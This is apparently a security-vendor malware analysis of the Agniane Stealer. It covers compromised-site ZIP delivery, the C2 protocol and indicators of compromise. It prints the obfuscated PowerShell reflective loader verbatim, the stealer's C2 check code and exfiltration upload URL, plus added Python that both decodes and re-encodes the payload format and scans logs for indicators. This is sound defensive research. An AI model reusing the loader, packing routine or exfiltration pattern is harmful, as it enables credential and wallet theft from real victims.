The Agniane Stealer is an information-stealing malware primarily focusing on the cryptocurrency wallets of its victims. It gained recognition on the web beginning in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our latest research has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information on the malware's methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware's structure and communication.
We believe our work contributes to the tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful from incident response to detector development and is more suitable for a technical audience.
The Agniane Stealer has already been referenced in several articles. "The Agniane stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides more details about the malware." Our technical analysis indicates that it uses the ConfuserEx Protector and aims at similar targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.
Introduction
During our threat-hunting exercises in November 2023, we noticed a pattern of renamed PowerShell binaries, called passbook.bat.exe. On closer inspection of the host machines, we identified infections of the newly discovered malware family Agniane Stealer. Threat researcher Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account [1]. Researchers from the Zscaler ThreatLabz team [2] and Pulsedive threat researchers [3] eventually followed up with blog posts of their own. Our work aims to contribute more information to the understanding of campaigns involving the use of Agniane Stealer.
Execution Chain
The infections we detected appear to start with the download of ZIP files from compromised websites. All the websites from which we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the following URL pattern:
http[s]://<domain name>/book_[A-Z0-9]+-\d+.zip
Once downloaded and extracted, the ZIP file drops a BAT file (passbook.bat) and an additional ZIP file on the file system. The BAT file contains an obfuscated payload and, after its execution through cmd.exe, it drops an executable which is a renamed version of the PowerShell binary (passbook.bat.exe). [4]
This renamed PowerShell was used to execute a sequence of obfuscated commands.
passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\15\Rar$DIa63532.21112\passbook.bat').Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(':: @')) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX, '_CASH_', '');$_CASH_afghH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=');for ($i = 0; $i -le $_CASH_afghH.Length - 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] ('')))
The command line shown above performs the following actions:
- Reads the content of the previously extracted BAT file (passbook.bat).
- Through string matches and replacements, builds the payload dynamically and assigns it to a variable.
- Converts the payload and the static key from Base64 to byte arrays.
- XORs the payload using the static key.
- Decompresses the XORed payload using GZIP.
- Invokes the payload after reflectively loading it into memory.
To understand the actions taken against the target, we reversed the payload.
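As an added illustration (not code from the original post), the following Python re-implements the loader's decoding steps as a static extractor an analyst can run over a captured passbook.bat instead of executing it. The BAT text and the placeholder payload are constructed here; the XOR key is the one quoted in the command line above.

```python
import base64
import gzip
import re

# XOR key as it appears (Base64) in the PowerShell one-liner above.
XOR_KEY_B64 = "ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is="
KEY = base64.b64decode(XOR_KEY_B64)


def encode_stage(payload: bytes, key: bytes) -> str:
    """Inverse of the loader's steps; used only to build the constructed sample."""
    blob = gzip.compress(payload)
    xored = bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))
    b64 = base64.b64encode(xored).decode()
    # Sprinkle the '_CASH_' marker that the loader strips out again.
    return "_CASH_".join(b64[i:i + 8] for i in range(0, len(b64), 8))


# Constructed batch file in the layout the loader reads: the payload sits in a
# ':: @' comment line. The "payload" is a harmless placeholder, not the stealer.
SAMPLE_BAT = (
    "@echo off\r\n"
    "start passbook.bat.exe -noprofile -windowstyle hidden -ep bypass ...\r\n"
    ":: @" + encode_stage(b"MZ-placeholder: constructed second stage", KEY) + "\r\n"
)


def extract_stage(bat_text: str, key: bytes) -> bytes:
    """Mirror of the one-liner: find the ':: @' line, drop the marker,
    Base64-decode, XOR with the key, gunzip. Returns the embedded assembly."""
    for line in bat_text.splitlines():   # loader splits on Environment.NewLine
        if line.startswith(":: @"):
            encoded = line[4:]           # Substring(4)
            break
    else:
        raise ValueError("no ':: @' payload line found")
    encoded = re.sub("_CASH_", "", encoded)
    xored = base64.b64decode(encoded)
    blob = bytes(b ^ key[i % len(key)] for i, b in enumerate(xored))
    return gzip.decompress(blob)


if __name__ == "__main__":
    stage = extract_stage(SAMPLE_BAT, KEY)
    print(len(stage), stage[:16])
```

On a real sample the returned bytes are the second-stage .NET assembly, which can then be hashed and inspected offline.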
Binary Analysis
The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with the hash below:
5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
At the time of the analysis, the file was unknown to online sandboxes. We decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed, as we did not execute the first stage of the malware sample. Therefore, we decided to analyze the sample manually, where we later found that anti-sandbox techniques are used.
The binary file was heavily obfuscated with control flow manipulations, like ConfuserEx.
It is important to note that the sample did not contain a signature for ConfuserEx, but it had an obfuscation method that resembled it.
After reversing the sample, we learned that it contains another binary file in its resources section, which was being reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.
As you can see from the previous screenshot, it is calling Invoke functions from an EntryPoint object, which contains a parsed resource.
The entire loading process looks as if passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# application, which reflectively loads the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:
Command and Control
The Agniane Stealer operates in a simple yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any of its domains through a simple C# web request, checking if the return value is "13". This time the request was made to a URL labeled "check", for instance:
WebClient wc = new WebClient();
string urlData = wc.DownloadString("https://trecube[.]com/check");
if (urlData == "13") { list_of_active_c2.Add("trecube[.]com"); continue; }
In our sample, we can see the following IOCs (indicators of compromise) provided in the resources file:
trecube[.]com
trecube13[.]ru
imitato23[.]store
wood100home[.]ru
For all these domains, the sample is looking for a check URL.
Later, the malware calls the C2 to get a list of file extensions to look for. This is located at the URL pattern getext?id= followed by an ID, which is part of the resources of the _CASH_78 file. On this site, the list of extensions is separated by semicolons, and for example on the website trecube[.]store it looks like:
*.txt; *.doc; *.docx; *.wallet; *seed*
Again, this is handled in the same way as the earlier check string in the code. It is parsed/split by semicolon and a list of extensions is created in a list variable in the C# code.
Subsequently, the malware requests a remote JSON file containing details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be used for monitoring the malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:
hxxps://trecube13[.]ru/getjson?id=67
And here is what its corresponding output looks like:
{
  "debug": "0",
  "emulate": "0",
  "virtualbox": "1",
  "virustotal": "0",
  "error": "0",
  "errorname": "NONE",
  "errortext": "NONE",
  "competitor": "0"
}
The next stage involves enumeration and collection. It scans the computer to collect all documents with the extensions specified by the URL with the "getext" pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common activity among information stealer malware. Additionally, Agniane checks the localization setting of the victim computer. If it contains any of the language packages below, it does not proceed with the infection:
ru-RU
kk-KZ
ro-MD
uz-UZ
be-BY
az-Latn-AZ
hy-AM
ky-KG
tg-Cyrl-TJ
The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations, it is possible to expect that the attacker is from a country with strong diplomatic ties to Russia.
Once all the target files are collected, the malware creates a ZIP archive under the "local application data" folder:
C:\Users\[user]\AppData\Local\[A-Z0-9]{32}
Below is the structure/content of this archive file:
Agniane Stealer.txt   // added as attachment here
Installed Apps.txt    // added as attachment here
PC Data.txt           // added as attachment here
Files from Desktop    // FOLDER - contains exfiltrated files from the Desktop folder
Files from ...        // FOLDER - contains exfiltrated files from ...
...                   // and other folders, which contain exfiltrated files
It is later uploaded to:
https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0
Below you can find the illustrated version of the Agniane Stealer's C2 communication.
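As an added example that is not part of the original post, the following Python classifies proxy log lines (constructed here; the log format and client addresses are assumptions) against the delivery URL pattern, the C2 paths (/check, /getext, /getjson) on the domains listed in this post, and the AGNIANE- token in the gate upload, so each stage of the chain can be flagged from network telemetry.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines: "<timestamp> <client> <method> <url>". Not real telemetry.
LOG_LINES = [
    "2023-11-14T09:12:01Z 10.0.0.15 GET https://compromised-site.invalid/book_AX7Q9-42.zip",
    "2023-11-14T09:13:40Z 10.0.0.15 GET https://trecube.com/check",
    "2023-11-14T09:13:41Z 10.0.0.15 GET https://trecube13.ru/getext?id=67",
    "2023-11-14T09:13:42Z 10.0.0.15 GET https://trecube13.ru/getjson?id=67",
    "2023-11-14T09:13:44Z 10.0.0.15 GET http://ip-api.com/json/?fields=11827",
    "2023-11-14T09:15:02Z 10.0.0.15 POST https://trecube.com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&token=AGNIANE-67135734941648",
    "2023-11-14T09:16:00Z 10.0.0.22 GET https://example.invalid/book_club/newsletter.pdf",
]

# C2 domains from the sample's resources (defanged in the post, refanged here).
C2_DOMAINS = {"trecube.com", "trecube.store", "trecube13.ru", "imitato23.store", "wood100home.ru"}
# Delivery pattern from the post: book_[A-Z0-9]+-\d+.zip on an otherwise legitimate site.
DOWNLOAD_RE = re.compile(r"/book_[A-Z0-9]+-\d+\.zip$")
C2_PATHS = {"/check": "liveness check", "/getext": "extension list fetch",
            "/getjson": "anti-analysis flags fetch"}


def classify(url):
    """Return a verdict string for the Agniane stage a URL matches, or None."""
    u = urlsplit(url)
    query = parse_qs(u.query)
    if DOWNLOAD_RE.search(u.path):
        return "delivery: book_*.zip download"
    # The token prefix is domain-independent, so it survives C2 domain rotation.
    if u.path == "/gate" and any(t.startswith("AGNIANE-") for t in query.get("token", [])):
        return "exfil: gate upload with AGNIANE token"
    if u.hostname in C2_DOMAINS:
        stage = C2_PATHS.get(u.path, "known Agniane domain")
        return "c2: " + stage
    return None   # ip-api.com alone is too common to alert on by itself


def scan(lines):
    """Return (client, verdict) pairs for every line that matches a stage."""
    hits = []
    for line in lines:
        _ts, client, _method, url = line.split(" ", 3)
        verdict = classify(url)
        if verdict:
            hits.append((client, verdict))
    return hits


if __name__ == "__main__":
    for client, verdict in scan(LOG_LINES):
        print(client, verdict)
```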
Other TTPs
The Agniane Stealer was also seen performing the following actions:
- Enumerating the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall for installed applications; it also collects this information.
- Checking for a public IP on ip-api.com, i.e., https://ip-api.com/json/?fields=11827
- Dumping Bitcoin and other cryptocurrency wallets.
- Performing (not well) checks to see if it is running in a debugged or virtual environment, etc.
- Collecting wallet.dat files.
- Enumerating Profile and User data.
- Collecting saved credit cards.
- Adding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).
Conclusion
The Agniane Stealer tries to remain undetected through various obfuscation and anti-VM/debug techniques. It exhibits common behavior for stealers, such as collecting and exfiltrating files, credentials, passwords, credit card details, wallets, etc. Its evasive nature and targeting of various information may attract more adversaries in the future to leverage its services.
Kill Chain
Kill Chain | Activity | TTP
Weaponization | Use of PowerShell, ZIP file, batch file | T1059.005, T1059.001
Delivery | ZIP file downloaded by the browser | T1204.002
Delivery | Use of compromised websites | T1584.004
Exploitation | Running obfuscated PowerShell payload | T1059.001, T1027.010
Exploitation | PowerShell decrypts payload using XOR and decompresses using Gunzip | T1140, T1059.001
Exploitation | Reflective loading of the payload through PowerShell | T1059.001, T1204.002, T1620
Exploitation | Use of renamed PowerShell | T1036.003
Installation | |
Command and Control | |
Actions on Objectives | Collection of various information from the host | T1119
Actions on Objectives | Targeting of credentials | T1555
Indicators of Compromise
Type | Stage | IOC (indicators of compromise)
File Hash | Delivery | 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
File Hash | Delivery | e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
File Hash | Delivery | b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
Domain | C2 | trecube[.]com
Domain | C2 | trecube[.]store
Domain | C2 | trecube13[.]ru
Domain | C2 | imitato23[.]store
Domain | C2 | wood100home[.]ru
References
[1] https://twitter.com/MalGamy12/status/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://blog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer